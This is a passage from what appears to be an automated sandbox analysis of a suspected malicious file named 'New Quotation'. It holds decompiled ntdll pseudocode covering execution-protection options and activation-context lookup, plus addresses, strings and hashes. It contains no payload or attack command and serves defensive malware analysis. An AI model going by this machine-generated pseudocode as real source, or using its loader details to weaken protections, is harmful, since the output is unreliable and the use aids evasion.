					return E1D814B50(_t45, _t85, _v8 ^ _t107, _t102, _t105, _t106);
				}
				_t85 = 0;
				E1D7DE580(3,  *((intOrPtr*)(__ecx + 0x18)), 0, 0,  &_v564);
				if(( *0x7ffe02d5 & 0x00000003) == 0) {
					_t45 = 0;
				} else {
					_t45 =  *(_v564 + 0x5f) & 0x00000001;
				}
				if(_t45 == 0) {
					_v556 = _t85;
					_t49 = E1D807738(_t105);
					__eflags = _t49;
					if(_t49 != 0) {
						L15:
						_t103 = 2;
						_v556 = _t103;
						L10:
						__eflags = ( *0x7ffe02d5 & 0x0000000c) - 4;
						if(( *0x7ffe02d5 & 0x0000000c) == 4) {
							_t45 = 1;
						} else {
							_t53 = E1D80763B(_v564);
							asm("sbb al, al");
							_t45 =  ~_t53 + 1;
							__eflags = _t45;
						}
						__eflags = _t45;
						if(_t45 == 0) {
							_t102 = _t103 | 0x00000040;
							_v556 = _t102;
						}
						__eflags = _t102;
						if(_t102 != 0) {
							L33:
							_push("true");
							_push( &_v556);
							_push(0x22);
							_push(0xffffffff);
							_t45 = E1D812B70();
						}
						goto L4;
					}
					_v552 = _t85;
					_t102 =  &_v552;
					_t55 = E1D8076ED(_t105 + 0x2c, _t102);
					__eflags = _t55;
					if(_t55 >= 0) {
						__eflags = _v552 - _t85;
						if(_v552 == _t85) {
							goto L8;
						}
						_t85 = _t105 + 0x24;
						E1D85EF10(0x55, 3, "CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions\n", _v552);
						_v560 = 0x214;
						E1D818F40( &_v548, 0, 0x214);
						_t106 =  *0x1d8c6664;
						_t110 = _t108 + 0x20;
						 *0x1d8c91e0( *((intOrPtr*)(_t105 + 0x28)),  *((intOrPtr*)(_t105 + 0x18)),  *((intOrPtr*)(_t105 + 0x20)), L"ExecuteOptions",  &_v568,  &_v548,  &_v560, _t85);
						_t65 =  *((intOrPtr*)( *0x1d8c6664))();
						__eflags = _t65;
						if(_t65 == 0) {
							goto L8;
						}
						_t66 = _v560;
						__eflags = _t66;
						if(_t66 == 0) {
							goto L8;
						}
						__eflags = _t66 - 0x214;
						if(_t66 >= 0x214) {
							goto L8;
						}
						_t68 = (_t66 >> 1) * 2 - 2;
						__eflags = _t68 - 0x214;
						if(_t68 >= 0x214) {
							E1D814C68();
							goto L33;
						}
						_push(_t85);
						 *((short*)(_t107 + _t68 - 0x220)) = 0;
						E1D85EF10(0x55, 3, "CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database\n",  &_v548);
						_t111 = _t110 + 0x14;
						_t73 = E1D81A9C0( &_v548, L"Execute=1");
						_push(_t85);
						__eflags = _t73;
						if(_t73 == 0) {
							E1D85EF10(0x55, 3, "CLIENT(ntdll): Processing %ws for patching section protection for %wZ\n",  &_v548);
							_t106 =  &_v548;
							_t98 =  &_v548;
							_t112 = _t111 + 0x14;
							_t77 = _v560 + _t98;
							_v552 = _t77;
							__eflags = _t98 - _t77;
							if(_t98 >= _t77) {
								goto L8;
							} else {
								goto L27;
							}
							do {
								L27:
								_t85 = E1D81A690(_t106, 0x20);
								__eflags = _t85;
								if(__eflags != 0) {
									__eflags = 0;
									 *_t85 = 0;
								}
								E1D85EF10(0x55, 3, "CLIENT(ntdll): Processing section info %ws...\n", _t106);
								_t112 = _t112 + 0x10;
								E1D84CC1E(_t105, _t106, __eflags);
								__eflags = _t85;
								if(_t85 == 0) {
									goto L8;
								}
								_t41 = _t85 + 2; // 0x2
								_t106 = _t41;
								__eflags = _t106 - _v552;
							} while (_t106 < _v552);
							goto L8;
						}
						_push("CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ\n");
						_push(3);
						_push(0x55);
						E1D85EF10();
						goto L15;
					}
					L8:
					_t56 = E1D807648(_t105);
					__eflags = _t56;
					if(_t56 != 0) {
						goto L15;
					}
					_t103 = _v556;
					goto L10;
				} else {
					L4:
					 *(_t105 + 0x34) =  *(_t105 + 0x34) | 0x80000000;
					goto L5;
				}
			}
































                                                                                                                                                                                          0x1d807560
                                                                                                                                                                                          0x1d807562
                                                                                                                                                                                          0x1d80756f
                                                                                                                                                                                          0x1d807571
                                                                                                                                                                                          0x1d8075ab
                                                                                                                                                                                          0x1d8075b9
                                                                                                                                                                                          0x1d8075b9
                                                                                                                                                                                          0x1d807579
                                                                                                                                                                                          0x1d807583
                                                                                                                                                                                          0x1d80758f
                                                                                                                                                                                          0x1d844443
                                                                                                                                                                                          0x1d807595
                                                                                                                                                                                          0x1d80759e
                                                                                                                                                                                          0x1d80759e
                                                                                                                                                                                          0x1d8075a2
                                                                                                                                                                                          0x1d8075bc
                                                                                                                                                                                          0x1d8075c2
                                                                                                                                                                                          0x1d8075c7
                                                                                                                                                                                          0x1d8075c9
                                                                                                                                                                                          0x1d807621
                                                                                                                                                                                          0x1d807623
                                                                                                                                                                                          0x1d807624
                                                                                                                                                                                          0x1d8075f8
                                                                                                                                                                                          0x1d8075ff
                                                                                                                                                                                          0x1d807601
                                                                                                                                                                                          0x1d80762c
                                                                                                                                                                                          0x1d807603
                                                                                                                                                                                          0x1d807609
                                                                                                                                                                                          0x1d807610
                                                                                                                                                                                          0x1d807612
                                                                                                                                                                                          0x1d807612
                                                                                                                                                                                          0x1d807612
                                                                                                                                                                                          0x1d807614
                                                                                                                                                                                          0x1d807616
                                                                                                                                                                                          0x1d807630
                                                                                                                                                                                          0x1d807633
                                                                                                                                                                                          0x1d807633
                                                                                                                                                                                          0x1d807618
                                                                                                                                                                                          0x1d80761a
                                                                                                                                                                                          0x1d8445c9
                                                                                                                                                                                          0x1d8445c9
                                                                                                                                                                                          0x1d8445d1
                                                                                                                                                                                          0x1d8445d2
                                                                                                                                                                                          0x1d8445d4
                                                                                                                                                                                          0x1d8445d6
                                                                                                                                                                                          0x1d8445d6
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d80761a
                                                                                                                                                                                          0x1d8075ce
                                                                                                                                                                                          0x1d8075d4
                                                                                                                                                                                          0x1d8075da
                                                                                                                                                                                          0x1d8075df
                                                                                                                                                                                          0x1d8075e1
                                                                                                                                                                                          0x1d84444a
                                                                                                                                                                                          0x1d844450
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d844456
                                                                                                                                                                                          0x1d844469
                                                                                                                                                                                          0x1d844476
                                                                                                                                                                                          0x1d844486
                                                                                                                                                                                          0x1d84448b
                                                                                                                                                                                          0x1d844497
                                                                                                                                                                                          0x1d8444b9
                                                                                                                                                                                          0x1d8444bf
                                                                                                                                                                                          0x1d8444c1
                                                                                                                                                                                          0x1d8444c3
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d8444c9
                                                                                                                                                                                          0x1d8444cf
                                                                                                                                                                                          0x1d8444d1
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d8444dc
                                                                                                                                                                                          0x1d8444de
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d8444e6
                                                                                                                                                                                          0x1d8444ed
                                                                                                                                                                                          0x1d8444ef
                                                                                                                                                                                          0x1d8445c4
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d8445c4
                                                                                                                                                                                          0x1d8444f7
                                                                                                                                                                                          0x1d8444f8
                                                                                                                                                                                          0x1d844510
                                                                                                                                                                                          0x1d844515
                                                                                                                                                                                          0x1d844524
                                                                                                                                                                                          0x1d84452b
                                                                                                                                                                                          0x1d84452c
                                                                                                                                                                                          0x1d84452e
                                                                                                                                                                                          0x1d844556
                                                                                                                                                                                          0x1d844561
                                                                                                                                                                                          0x1d844567
                                                                                                                                                                                          0x1d844569
                                                                                                                                                                                          0x1d84456c
                                                                                                                                                                                          0x1d84456e
                                                                                                                                                                                          0x1d844574
                                                                                                                                                                                          0x1d844576
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d84457c
                                                                                                                                                                                          0x1d84457c
                                                                                                                                                                                          0x1d844584
                                                                                                                                                                                          0x1d844588
                                                                                                                                                                                          0x1d84458a
                                                                                                                                                                                          0x1d84458c
                                                                                                                                                                                          0x1d84458e
                                                                                                                                                                                          0x1d84458e
                                                                                                                                                                                          0x1d84459b
                                                                                                                                                                                          0x1d8445a0
                                                                                                                                                                                          0x1d8445a7
                                                                                                                                                                                          0x1d8445ac
                                                                                                                                                                                          0x1d8445ae
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d8445b4
                                                                                                                                                                                          0x1d8445b4
                                                                                                                                                                                          0x1d8445b7
                                                                                                                                                                                          0x1d8445b7
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d8445bf
                                                                                                                                                                                          0x1d844530
                                                                                                                                                                                          0x1d844535
                                                                                                                                                                                          0x1d844537
                                                                                                                                                                                          0x1d844539
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d84453e
                                                                                                                                                                                          0x1d8075e7
                                                                                                                                                                                          0x1d8075e9
                                                                                                                                                                                          0x1d8075ee
                                                                                                                                                                                          0x1d8075f0
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d8075f2
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d8075a4
                                                                                                                                                                                          0x1d8075a4
                                                                                                                                                                                          0x1d8075a4
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d8075a4

                                                                                                                                                                                          Strings
                                                                                                                                                                                          • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 1D844507
                                                                                                                                                                                          • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 1D844530
                                                                                                                                                                                          • Execute=1, xrefs: 1D84451E
                                                                                                                                                                                          • CLIENT(ntdll): Processing section info %ws..., xrefs: 1D844592
                                                                                                                                                                                          • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 1D84454D
                                                                                                                                                                                          • ExecuteOptions, xrefs: 1D8444AB
                                                                                                                                                                                          • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 1D844460
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000007.00000002.49660847466.000000001D7A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D7A0000, based on PE: true
                                                                                                                                                                                          • Associated: 00000007.00000002.49662270374.000000001D8C9000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000007.00000002.49662305343.000000001D8CD000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_7_2_1d7a0000_New Quotation.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID:
                                                                                                                                                                                          • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                                                                                                                                                                                          • API String ID: 0-484625025
                                                                                                                                                                                          • Opcode ID: b76cff7cab569b822c1e198df8ac75536dcbad43b4ae81a0dddb8772c9fa098b
                                                                                                                                                                                          • Instruction ID: 2ea069d3b2960e2236862f4a8d51e120dc2a24bbe76fb7e18f826c1f40358bd6
                                                                                                                                                                                          • Opcode Fuzzy Hash: b76cff7cab569b822c1e198df8ac75536dcbad43b4ae81a0dddb8772c9fa098b
                                                                                                                                                                                          • Instruction Fuzzy Hash: 0F514A35A0021DBADF11AE9CEC85FFD73A8EF08310F1145E9E605A7190DB70AA45CB53
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 1D7EA170 Relevance: 12.7, APIs: 1, Strings: 6, Instructions: 404COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          C-Code - Quality: 48%
                                                                                                                                                                                          			E1D7EA170(signed char _a4, intOrPtr _a8, signed int _a12, intOrPtr _a16, intOrPtr* _a20) {
				signed int _v8;
				char _v12;
				signed int _v16;
				intOrPtr _v20;
				signed char _v24;
				intOrPtr _v28;
				char _v36;
				char _v40;
				intOrPtr _v44;
				char _v48;
				intOrPtr _v52;
				char _v56;
				signed int _v60;
				char _v64;
				intOrPtr _v68;
				void* _v72;
				void* _v76;
				void* _v80;
				void* _v84;
				void* _v85;
				void* _v88;
				void* _v96;
				void* _v109;
				intOrPtr _t128;
				void* _t129;
				intOrPtr* _t130;
				intOrPtr _t135;
				void* _t136;
				intOrPtr _t145;
				intOrPtr _t151;
				intOrPtr* _t164;
				intOrPtr _t165;
				signed int _t166;
				intOrPtr _t172;
				intOrPtr _t173;
				intOrPtr _t176;
				signed int _t177;
				intOrPtr _t178;
				intOrPtr _t181;
				void* _t190;
				intOrPtr* _t191;
				intOrPtr _t201;
				signed int _t202;
				void* _t203;
				signed char _t213;
				intOrPtr _t214;
				intOrPtr _t217;
				signed int _t219;
				signed int _t224;
				intOrPtr _t228;
				intOrPtr _t229;
				signed int _t234;
				void* _t236;
				signed int _t240;
				void* _t242;

				_t178 =  *[fs:0x18];
				_t242 = (_t240 & 0xfffffff8) - 0x3c;
				_t128 =  *((intOrPtr*)(_t178 + 0x30));
				if( *((intOrPtr*)(_t128 + 0x1f8)) == 0) {
					if( *((intOrPtr*)(_t128 + 0x200)) != 0 ||  *((intOrPtr*)( *((intOrPtr*)(_t178 + 0x1a8)))) != 0) {
						goto L1;
					} else {
						_t129 = 0xc0150001;
						goto L33;
					}
				} else {
					L1:
					_v48 = 0;
					_v36 = 0xffffffff;
					_v40 = 0;
					if(_a16 == 0) {
						L83:
						_t129 = 0xc000000d;
						goto L33;
					} else {
						_t213 = _a4;
						if((_t213 & 0xfffffff8) != 0) {
							goto L83;
						} else {
							_t130 = _a20;
							if((_t213 & 0x00000007) == 0) {
								if(_t130 != 0) {
									goto L5;
								} else {
									goto L6;
								}
							} else {
								if(_t130 == 0) {
									goto L83;
								} else {
									L5:
									if( *_t130 < 0x24) {
										goto L83;
									} else {
										L6:
										if((_t213 & 0x00000002) == 0) {
											L9:
											if((_t213 & 0x00000004) != 0) {
												if(_t130 + 0x40 <=  *_t130 + _t130) {
													goto L10;
												} else {
													_push(0xc000000d);
													_push("RtlpFindActivationContextSection_CheckParameters");
													_push("SXS: %s() flags contains return_assembly_metadata but they don\'t fit in size, return invalid_parameter 0x%08lx.\n");
													goto L82;
												}
											} else {
												L10:
												_t233 = _a8;
												_v24 = _t213;
												_t214 =  *[fs:0x18];
												_v16 = _a12;
												_v12 = 0;
												_t172 = _v12;
												_t181 =  *((intOrPtr*)(_t214 + 0x30));
												_v28 = 0x18;
												_v8 = 0;
												_v20 = _a8;
												_v60 = 0;
												_v52 = _t214;
												_v44 = _t181;
												while(1) {
													_t135 = _t172;
													if(_t135 != 0) {
														goto L34;
													}
													_t164 =  *((intOrPtr*)(_t214 + 0x1a8));
													if(_t164 == 0) {
														L14:
														_t228 =  *((intOrPtr*)(_t181 + 0x1f8));
														_v60 = 0;
														if(_t228 == 0) {
															L36:
															_t228 =  *((intOrPtr*)(_t181 + 0x200));
															_v60 = 0xfffffffc;
															if(_t228 == 0) {
																L87:
																if(_t172 <= 3) {
																	goto L16;
																} else {
																	_t129 = 0xc00000e5;
																	goto L90;
																}
															} else {
																_t172 = 3;
																_v12 = 3;
																goto L16;
															}
														} else {
															_t172 = 2;
															_v12 = 2;
															goto L16;
														}
													} else {
														_t165 =  *_t164;
														if(_t165 != 0) {
															_t166 =  *((intOrPtr*)(_t165 + 4));
															_v60 = _t166;
															if(_t166 != 0) {
																if(_t166 == 0xfffffffc) {
																	_t228 =  *((intOrPtr*)(_t181 + 0x200));
																	goto L56;
																} else {
																	if(_t166 == 0xfffffffd) {
																		_t228 = "Actx ";
																		goto L57;
																	} else {
																		_t228 =  *((intOrPtr*)(_t166 + 0x10));
																		goto L56;
																	}
																}
															} else {
																L56:
																if(_t228 == 0) {
																	goto L14;
																} else {
																	L57:
																	_t172 = 1;
																	_v12 = 1;
																	L16:
																	if(_t228 == 0) {
																		_t129 = 0xc0150001;
																		L90:
																		_t234 = 0;
																		goto L91;
																	} else {
																		_t129 = E1D7EA600(_t228, _t233, _a12,  &_v56,  &_v48);
																		if(_t129 < 0) {
																			_t234 = 0;
																			if(_t129 != 0xc0150001 || _t172 == 3) {
																				goto L19;
																			} else {
																				_t181 = _v44;
																				_t214 = _v52;
																				_t233 = _a8;
																				continue;
																			}
																		} else {
																			_t224 = _v60;
																			_v8 = (0 | _t224 != 0xfffffffc) - 0x00000001 & 0x00000002 | 0 | _t224 == 0x00000000;
																			asm("sbb esi, esi");
																			_t234 =  ~(_t224 - 0xfffffffc) & _t224;
																			_t129 = 0;
																			L19:
																			if(_t129 < 0) {
																				L91:
																				if(_t129 < 0) {
																					goto L33;
																				} else {
																					goto L20;
																				}
																			} else {
																				L20:
																				_t173 = _v48;
																				if(_t173 < 0x2c) {
																					L110:
																					_t138 = _v56;
																					goto L111;
																				} else {
																					_t229 = _a20;
																					while(1) {
																						L22:
																						_t138 = _v56;
																						if( *_v56 != 0x64487353) {
																							break;
																						}
																						_t242 = _t242 - 8;
																						_t129 = E1D7EA760(_t138, _t173, _a16, _t229,  &_v36,  &_v40);
																						if(_t129 >= 0) {
																							_t83 = _t234 - 1; // -1
																							if((_t83 | 0x00000007) != 0xffffffff) {
																								_t145 =  *((intOrPtr*)(_t234 + 0x14));
																								_v40 = _t145;
																								if(_t145 != 0 && (( *(_t234 + 0x1c) & 0x00000008) == 0 || ( *(_t234 + 0x3c) & 0x00000008) == 0)) {
																									 *((char*)(_t242 + 0xf)) = 0;
																									 *0x1d8c91e0(3, _t234,  *((intOrPtr*)(_t234 + 0x10)),  *((intOrPtr*)(_t234 + 0x18)), 0, _t242 + 0xf);
																									_v40();
																									 *(_t234 + 0x1c) =  *(_t234 + 0x1c) | 0x00000008;
																									if( *((char*)(_t242 + 0xf)) != 0) {
																										 *(_t234 + 0x3c) =  *(_t234 + 0x3c) | 0x00000008;
																									}
																								}
																							}
																							if(_t229 == 0) {
																								L67:
																								return 0;
																							} else {
																								_t129 = E1D7D4428(_a4, _t229, _t234,  &_v36, _v64,  *((intOrPtr*)(_v64 + 0x24)),  *((intOrPtr*)(_v64 + 0x28)), _t173);
																								if(_t129 < 0) {
																									goto L33;
																								} else {
																									goto L67;
																								}
																							}
																						} else {
																							if(_t129 != 0xc0150008) {
																								L33:
																								return _t129;
																							} else {
																								_t217 =  *[fs:0x18];
																								_t234 = 0;
																								_v68 = 0;
																								_v40 = _t217;
																								_v60 = 0;
																								_v52 =  *((intOrPtr*)(_t217 + 0x30));
																								_t176 = _v20;
																								L26:
																								while(1) {
																									if(_t176 <= 2) {
																										_t190 = _t176 - _t234;
																										if(_t190 == 0) {
																											_t191 =  *((intOrPtr*)(_t217 + 0x1a8));
																											if(_t191 == 0) {
																												goto L68;
																											} else {
																												_t201 =  *_t191;
																												if(_t201 == 0) {
																													goto L68;
																												} else {
																													_t202 =  *((intOrPtr*)(_t201 + 4));
																													_v60 = _t202;
																													if(_t202 == 0) {
																														L102:
																														if(_t151 == 0) {
																															goto L68;
																														} else {
																															goto L103;
																														}
																													} else {
																														if(_t202 != 0xfffffffc) {
																															if(_t202 != 0xfffffffd) {
																																_t151 =  *((intOrPtr*)(_t202 + 0x10));
																																goto L101;
																															} else {
																																_t151 = "Actx ";
																																_v68 = _t151;
																																L103:
																																_t176 = 1;
																																_v20 = 1;
																																goto L28;
																															}
																														} else {
																															_t151 =  *((intOrPtr*)(_v52 + 0x200));
																															L101:
																															_v68 = _t151;
																															goto L102;
																														}
																													}
																												}
																											}
																										} else {
																											_t203 = _t190 - 1;
																											if(_t203 == 0) {
																												L68:
																												_v60 = 0;
																												_t151 =  *((intOrPtr*)(_v52 + 0x1f8));
																												_v68 = _t151;
																												if(_t151 == 0) {
																													goto L44;
																												} else {
																													_t176 = 2;
																													_v20 = 2;
																													goto L28;
																												}
																											} else {
																												if(_t203 != 1) {
																													goto L27;
																												} else {
																													L44:
																													_v60 = 0xfffffffc;
																													_t151 =  *((intOrPtr*)(_v52 + 0x200));
																													_v68 = _t151;
																													if(_t151 == 0) {
																														goto L27;
																													} else {
																														_t176 = 3;
																														_v20 = 3;
																														goto L28;
																													}
																												}
																											}
																										}
																									} else {
																										L27:
																										if(_t176 > 3) {
																											_t129 = 0xc00000e5;
																											goto L30;
																										} else {
																											L28:
																											if(_t151 != 0) {
																												_t129 = E1D7EA600(_t151, _a8, _a12,  &_v64,  &_v56);
																												if(_t129 < 0) {
																													_t219 = 0;
																													if(_t129 != 0xc0150001 || _t176 == 3) {
																														goto L48;
																													} else {
																														_t151 = _v68;
																														_t217 = _v40;
																														continue;
																													}
																												} else {
																													_t177 = _v60;
																													_v16 = (0 | _t177 != 0xfffffffc) - 0x00000001 & 0x00000002 | 0 | _t177 == 0x00000000;
																													asm("sbb edx, edx");
																													_t219 =  ~(_t177 - 0xfffffffc) & _t177;
																													_t129 = 0;
																													L48:
																													if(_t129 < 0) {
																														goto L31;
																													} else {
																														if(_t219 != 0) {
																															_t125 = _t219 - 1; // -1
																															if((_t125 | 0x00000007) != 0xffffffff &&  *_t219 != 0x7fffffff) {
																																while(1) {
																																	_t236 =  *_t219;
																																	if(_t236 == 0x7fffffff) {
																																		goto L50;
																																	}
																																	asm("lock cmpxchg [edx], ecx");
																																	if(_t236 != _t236) {
																																		continue;
																																	} else {
																																		goto L50;
																																	}
																																	goto L112;
																																}
																															}
																														}
																														L50:
																														_t234 = _t219;
																														goto L51;
																													}
																												}
																											} else {
																												_t129 = 0xc0150001;
																												L30:
																												if(_t129 >= 0) {
																													L51:
																													_t173 = _v56;
																													if(_t173 >= 0x2c) {
																														goto L22;
																													} else {
																														goto L110;
																													}
																												} else {
																													L31:
																													if(_t129 == 0xc0150001) {
																														_t129 = 0xc0150008;
																													}
																													goto L33;
																												}
																											}
																										}
																									}
																									goto L112;
																								}
																							}
																						}
																						goto L112;
																					}
																					L111:
																					_push(_t173);
																					E1D85EF10(0x33, 0, "RtlFindActivationContextSectionString() found section at %p (length %lu) which is not a string section\n", _t138);
																					_t129 = 0xc0150003;
																					goto L33;
																				}
																			}
																		}
																	}
																}
															}
														} else {
															goto L14;
														}
													}
													goto L112;
													L34:
													_t136 = _t135 - 1;
													if(_t136 == 0) {
														goto L14;
													} else {
														if(_t136 != 1) {
															goto L87;
														} else {
															goto L36;
														}
													}
													goto L112;
												}
											}
										} else {
											if(_t130 + 0x2c >  *_t130 + _t130) {
												_push(0xc000000d);
												_push("RtlpFindActivationContextSection_CheckParameters");
												_push("SXS: %s() flags contains return_flags but they don\'t fit in size, return invalid_parameter 0x%08lx.\n");
												L82:
												_push(0);
												_push(0x33);
												E1D85EF10();
												goto L83;
											} else {
												_t130 = _a20;
												goto L9;
											}
										}
									}
								}
							}
						}
					}
				}
				L112:
			}


























































                                                                                                                                                                                          0x1d7ea178
                                                                                                                                                                                          0x1d7ea17f
                                                                                                                                                                                          0x1d7ea182
                                                                                                                                                                                          0x1d7ea18f
                                                                                                                                                                                          0x1d7ea4b4
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d8377ce
                                                                                                                                                                                          0x1d8377ce
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d8377ce
                                                                                                                                                                                          0x1d7ea195
                                                                                                                                                                                          0x1d7ea195
                                                                                                                                                                                          0x1d7ea199
                                                                                                                                                                                          0x1d7ea1a1
                                                                                                                                                                                          0x1d7ea1a9
                                                                                                                                                                                          0x1d7ea1b1
                                                                                                                                                                                          0x1d8377f3
                                                                                                                                                                                          0x1d8377f3
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d7ea1b7
                                                                                                                                                                                          0x1d7ea1b7
                                                                                                                                                                                          0x1d7ea1c0
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d7ea1c6
                                                                                                                                                                                          0x1d7ea1c6
                                                                                                                                                                                          0x1d7ea1cc
                                                                                                                                                                                          0x1d7ea5dc
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d7ea5e2
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d7ea5e2
                                                                                                                                                                                          0x1d7ea1d2
                                                                                                                                                                                          0x1d7ea1d4
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d7ea1da
                                                                                                                                                                                          0x1d7ea1da
                                                                                                                                                                                          0x1d7ea1dd
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d7ea1e3
                                                                                                                                                                                          0x1d7ea1e3
                                                                                                                                                                                          0x1d7ea1e6
                                                                                                                                                                                          0x1d7ea1fa
                                                                                                                                                                                          0x1d7ea1fd
                                                                                                                                                                                          0x1d7ea5f0
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d7ea5f6
                                                                                                                                                                                          0x1d8377fd
                                                                                                                                                                                          0x1d837802
                                                                                                                                                                                          0x1d837807
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d837807
                                                                                                                                                                                          0x1d7ea203
                                                                                                                                                                                          0x1d7ea203
                                                                                                                                                                                          0x1d7ea208
                                                                                                                                                                                          0x1d7ea20b
                                                                                                                                                                                          0x1d7ea20f
                                                                                                                                                                                          0x1d7ea216
                                                                                                                                                                                          0x1d7ea21c
                                                                                                                                                                                          0x1d7ea224
                                                                                                                                                                                          0x1d7ea228
                                                                                                                                                                                          0x1d7ea22b
                                                                                                                                                                                          0x1d7ea233
                                                                                                                                                                                          0x1d7ea23b
                                                                                                                                                                                          0x1d7ea23f
                                                                                                                                                                                          0x1d7ea243
                                                                                                                                                                                          0x1d7ea247
                                                                                                                                                                                          0x1d7ea250
                                                                                                                                                                                          0x1d7ea252
                                                                                                                                                                                          0x1d7ea255
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d7ea25b
                                                                                                                                                                                          0x1d7ea263
                                                                                                                                                                                          0x1d7ea26f
                                                                                                                                                                                          0x1d7ea26f
                                                                                                                                                                                          0x1d7ea277
                                                                                                                                                                                          0x1d7ea27d
                                                                                                                                                                                          0x1d7ea3ae
                                                                                                                                                                                          0x1d7ea3ae
                                                                                                                                                                                          0x1d7ea3b4
                                                                                                                                                                                          0x1d7ea3be
                                                                                                                                                                                          0x1d837823
                                                                                                                                                                                          0x1d837826
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d83782c
                                                                                                                                                                                          0x1d83782c
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d83782c
                                                                                                                                                                                          0x1d7ea3c4
                                                                                                                                                                                          0x1d7ea3c4
                                                                                                                                                                                          0x1d7ea3c9
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d7ea3c9
                                                                                                                                                                                          0x1d7ea283
                                                                                                                                                                                          0x1d7ea283
                                                                                                                                                                                          0x1d7ea288
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d7ea288
                                                                                                                                                                                          0x1d7ea265
                                                                                                                                                                                          0x1d7ea265
                                                                                                                                                                                          0x1d7ea269
                                                                                                                                                                                          0x1d7ea4bf
                                                                                                                                                                                          0x1d7ea4c2
                                                                                                                                                                                          0x1d7ea4c8
                                                                                                                                                                                          0x1d7ea4e3
                                                                                                                                                                                          0x1d83780e
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d7ea4e9
                                                                                                                                                                                          0x1d7ea4ec
                                                                                                                                                                                          0x1d837819
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d7ea4f2
                                                                                                                                                                                          0x1d7ea4f2
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d7ea4f2
                                                                                                                                                                                          0x1d7ea4ec
                                                                                                                                                                                          0x1d7ea4ca
                                                                                                                                                                                          0x1d7ea4ca
                                                                                                                                                                                          0x1d7ea4cc
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d7ea4d2
                                                                                                                                                                                          0x1d7ea4d2
                                                                                                                                                                                          0x1d7ea4d2
                                                                                                                                                                                          0x1d7ea4d7
                                                                                                                                                                                          0x1d7ea28c
                                                                                                                                                                                          0x1d7ea28e
                                                                                                                                                                                          0x1d837833
                                                                                                                                                                                          0x1d837838
                                                                                                                                                                                          0x1d837838
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d7ea294
                                                                                                                                                                                          0x1d7ea2a5
                                                                                                                                                                                          0x1d7ea2ac
                                                                                                                                                                                          0x1d7ea3d2
                                                                                                                                                                                          0x1d7ea3d9
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d7ea3e8
                                                                                                                                                                                          0x1d7ea3e8
                                                                                                                                                                                          0x1d7ea3ec
                                                                                                                                                                                          0x1d7ea3f0
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d7ea3f0
                                                                                                                                                                                          0x1d7ea2b2
                                                                                                                                                                                          0x1d7ea2b2
                                                                                                                                                                                          0x1d7ea2d2
                                                                                                                                                                                          0x1d7ea2d6
                                                                                                                                                                                          0x1d7ea2d8
                                                                                                                                                                                          0x1d7ea2da
                                                                                                                                                                                          0x1d7ea2dc
